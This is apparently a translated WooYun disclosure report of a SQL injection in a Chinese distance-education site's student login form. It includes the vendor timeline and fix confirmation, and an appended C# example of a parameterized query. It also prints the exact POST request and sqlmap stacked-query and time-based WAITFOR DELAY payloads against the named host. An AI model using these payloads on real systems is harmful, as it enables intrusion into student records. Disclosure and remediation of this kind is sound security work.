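Vulnerability summary

Bug ID: wooyun-2015-0126252

Vulnerability title: A SQL injection in 中国现代远程与继续教育网

Vendor: 北京希普无忧教育科技有限公司

Author: 路人甲

Submitted: 2015-07-13 11:45

Fixed: 2015-08-28 14:42

Published: 2015-08-28 14:42

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 10

Vulnerability status: confirmed by vendor

Source: http://www.wooyun.org. For questions or help, contact [email protected]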


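Vulnerability details

Disclosure status:

2015-07-13: details reported to the vendor, awaiting vendor handling
2015-07-14: vendor confirmed; details disclosed to the vendor only
2015-07-24: details disclosed to core white hats and experts in related fields
2015-08-03: details disclosed to regular white hats
2015-08-13: details disclosed to intern white hats
2015-08-28: details disclosed to the public

Brief description:

As the title says.

Detailed description:

Register through the "网院考生入口" (online college candidate entrance); after entering the account information you arrive at the page below.
Uh-oh, no student number, so let's try injection.

[Image: 1.jpg]


Request: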

POST /student/login/RelateStudentInfo.aspx HTTP/1.1
Host: server1.cdce.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://server1.cdce.cn/student/login/RelateStudentInfo.aspx
Cookie: ASP.NET_SessionId=kgx2c5u13od1rq45qhq45wmd; AJSTAT_ok_pages=1; AJSTAT_ok_times=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 5973
__VIEWSTATE=[...]&__VIEWSTATEGENERATOR=E942AD35&__EVENTVALIDATION=[...]&dropNetSchool=89&hid=aa&txtStudentNumber=2008601001&txtStudentCrtificateNumber=2008601001*&txtCheckCode=x433&btnOK=%C8%B7+%B6%A8


The parameter txtStudentCrtificateNumber is injectable.

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: (custom) POST
Parameter: #1*
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __VIEWSTATE=[...]&__VIEWSTATEGENERATOR=E942AD35&__EVENTVALIDATION=[...]&dropNetSchool=89&hid=aa&txtStudentNumber=2008601001&txtStudentCrtificateNumber=2008601001'; WAITFOR DELAY '0:0:5'--&txtCheckCode=x433&btnOK=%C8%B7 %B6%A8
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __VIEWSTATE=[...]&__VIEWSTATEGENERATOR=E942AD35&__EVENTVALIDATION=[...]&dropNetSchool=89&hid=aa&txtStudentNumber=2008601001&txtStudentCrtificateNumber=2008601001' WAITFOR DELAY '0:0:5'--&txtCheckCode=x433&btnOK=%C8%B7 %B6%A8
---
[09:00:47] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[09:00:47] [INFO] fetching current user
[09:00:48] [WARNING] time-based comparison requires larger statistical model, please wait..............................
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
[09:01:01] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
[09:01:12] [INFO] adjusting time delay to 2 seconds due to good response times
tongkao2015
current user: 'tongkao2015\x05'


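Proof of vulnerability:

[Image: 2.jpg]


Only the existence of the vulnerability was verified; no data was extracted further.

Suggested fix:

Filtering

Copyright notice: when reposting, please credit the source 路人甲@乌云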
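
A hardened shape for the lookup behind this form, as an added example that is not part of the original report and not the vendor's code: the two text fields are checked against an allowlist and then bound as typed parameters, so the posted value is never concatenated into the SQL text. The class name, table and column names, field formats and lengths are assumptions; only the form field names come from the request above.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;
using System.Text.RegularExpressions;

// Hypothetical helper for the code-behind of RelateStudentInfo.aspx.
public static class StudentLookup
{
    // Allowlist for the posted text fields (the "filtering" step).
    // Assumed formats: 6-20 digits, and 6-20 letters or digits.
    private static readonly Regex StudentNumberRx = new Regex(@"^[0-9]{6,20}\z");
    private static readonly Regex CertificateRx = new Regex(@"^[0-9A-Za-z]{6,20}\z");

    // Vulnerable shape, shown for contrast only: the posted value becomes
    // part of the SQL text, so a quote character ends the string literal.
    //   "... WHERE CertificateNumber = '" + certificateNumber + "'"

    public static bool IsValidInput(string studentNumber, string certificateNumber)
    {
        return studentNumber != null && certificateNumber != null
            && StudentNumberRx.IsMatch(studentNumber)
            && CertificateRx.IsMatch(certificateNumber);
    }

    // Returns true when a matching student row exists.
    public static bool StudentExists(string connectionString, int netSchoolId,
                                     string studentNumber, string certificateNumber)
    {
        // Reject malformed input before touching the database.
        if (!IsValidInput(studentNumber, certificateNumber))
            return false;

        // Hypothetical table and columns; the statement text is a constant.
        const string sql =
            "SELECT COUNT(*) FROM Students " +
            "WHERE NetSchoolID = @school " +
            "AND StudentNumber = @number " +
            "AND CertificateNumber = @cert";

        using (SqlConnection conn = new SqlConnection(connectionString))
        using (SqlCommand cmd = new SqlCommand(sql, conn))
        {
            // Values travel as typed parameters, never as SQL text.
            cmd.Parameters.Add("@school", SqlDbType.Int).Value = netSchoolId;
            cmd.Parameters.Add("@number", SqlDbType.VarChar, 20).Value = studentNumber;
            cmd.Parameters.Add("@cert", SqlDbType.VarChar, 20).Value = certificateNumber;
            conn.Open();
            return (int)cmd.ExecuteScalar() > 0;
        }
    }
}
```

With this shape, the value from the report (`2008601001'; WAITFOR DELAY '0:0:5'--`) fails the allowlist, and even without the allowlist it would only be compared as a literal string. Running the application under a database login with minimal rights limits what any remaining injection could reach.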


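Vulnerability response

Vendor response:

Severity: Low

Vulnerability Rank: 2

Confirmed: 2015-07-14 14:40

Vendor reply:

Thank you very much! The vulnerability has been fixed.
Please avoid unnecessary information disclosure, thank you!!!

Latest status:

None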